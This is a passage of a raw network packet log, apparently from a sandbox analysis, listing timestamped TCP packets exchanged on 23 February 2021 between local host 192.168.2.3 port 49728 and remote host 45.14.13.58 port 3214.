Feb 23, 2021 17:48:17.922278881 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922401905 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.922421932 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922458887 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922494888 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922496080 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.922601938 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922688007 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922719002 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922813892 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922888994 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922972918 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923008919 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923089027 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.923089981 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923181057 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923265934 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.923450947 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923482895 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923548937 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.923576117 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923640013 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923707008 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.923734903 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923746109 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923799992 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923835039 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.923887968 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.923974991 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924052954 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924093008 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924146891 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924211979 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924339056 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924408913 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.924416065 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924494982 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924536943 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924567938 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.924601078 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924650908 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924777031 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924940109 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.924972057 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.925097942 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.925110102 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.925174952 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.925184011 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.925254107 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.925256968 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.925309896 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.925414085 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.943802118 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.943881035 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.974108934 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.974144936 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.974181890 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.974339008 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.974438906 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.974445105 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.974520922 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.974545002 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.974626064 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.974663019 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.974711895 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.974739075 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975146055 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975178003 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975229979 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975250006 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975297928 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975300074 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975312948 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975358009 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975395918 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975429058 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975508928 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975517988 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975585938 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975671053 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975673914 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975707054 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975783110 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975807905 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975855112 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.975910902 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.975966930 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.976444960 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.976512909 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.976610899 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977225065 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977315903 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977421999 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977473021 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977484941 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977495909 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977546930 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977554083 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977600098 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977631092 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977633953 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977643967 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977670908 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977694988 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977756977 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977756977 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977792978 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977823019 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977866888 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977870941 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.977885962 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.977946997 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.978024960 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.978072882 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.978091002 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.978147984 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.978183031 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.978224993 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.014339924 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.014455080 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.026891947 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.026952982 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027086020 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027168989 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027204990 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027287960 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027333975 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.027369022 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027426958 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.027463913 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.027482033 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.027492046 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.027497053 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027563095 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.027566910 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027682066 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.027784109 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.027928114 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028058052 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028117895 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028192997 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.028199911 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028238058 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.028245926 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028265953 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.028310061 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.028343916 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028403997 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028403997 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.028486013 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028567076 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028568983 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.028697014 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.028791904 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.029310942 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029328108 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029340982 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029356003 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029453039 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.029606104 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029644966 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029684067 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029700994 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029715061 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029752970 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.029863119 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029877901 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029936075 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029953957 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.029973030 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.029985905 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.029993057 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030009985 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.030009985 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030021906 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.030033112 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.030056000 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.030133963 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030177116 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030215025 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030251980 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030251980 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.030337095 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030378103 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030455112 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030497074 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030534029 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030570030 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030659914 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030765057 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030843019 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030886889 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.030966043 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.031061888 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.031079054 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.031181097 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.031347036 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.031361103 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.031378984 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.032459021 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.032496929 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.032536983 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.066931963 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080038071 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080086946 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080113888 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080140114 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080208063 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080244064 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080338955 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080369949 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080394030 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080431938 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080600977 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080678940 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080703974 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080768108 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.080882072 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081001997 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081027985 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081073999 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081104040 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081199884 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081227064 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081252098 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081275940 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081312895 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081370115 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081543922 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081726074 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081753016 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081778049 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081804037 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.081828117 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082032919 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082060099 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082083941 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082221985 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082252026 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082298994 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082328081 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082691908 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082717896 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082742929 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082844019 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082868099 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082915068 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082966089 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.082993984 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083075047 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083164930 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083189964 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083224058 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083281040 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083317995 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083329916 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.083344936 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083370924 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083386898 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.083399057 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083435059 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083463907 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083509922 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083611012 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083638906 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083663940 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083688974 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083715916 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083750010 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083780050 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083803892 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083830118 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083833933 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.083856106 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083879948 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083904982 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083930016 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083964109 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.083993912 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084017992 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084043980 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084068060 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084090948 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084116936 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084141970 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084176064 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084207058 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084232092 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084249973 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084268093 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084296942 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084322929 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084347963 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084373951 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084399939 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084434032 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084462881 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084486961 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084512949 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084537983 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084563017 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084589005 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084614992 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084649086 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084678888 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084703922 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084727049 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.084728956 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084769011 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084773064 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.084794998 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084821939 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084847927 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084883928 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084913015 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084938049 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084963083 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.084988117 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.085011959 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.085038900 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.085063934 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.085098028 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.085139990 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.085177898 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.085254908 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.086333990 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.136073112 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137366056 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137422085 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137453079 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137480974 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137507915 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137526989 CET	3214	49728	45.14.13.58	192.168.2.3
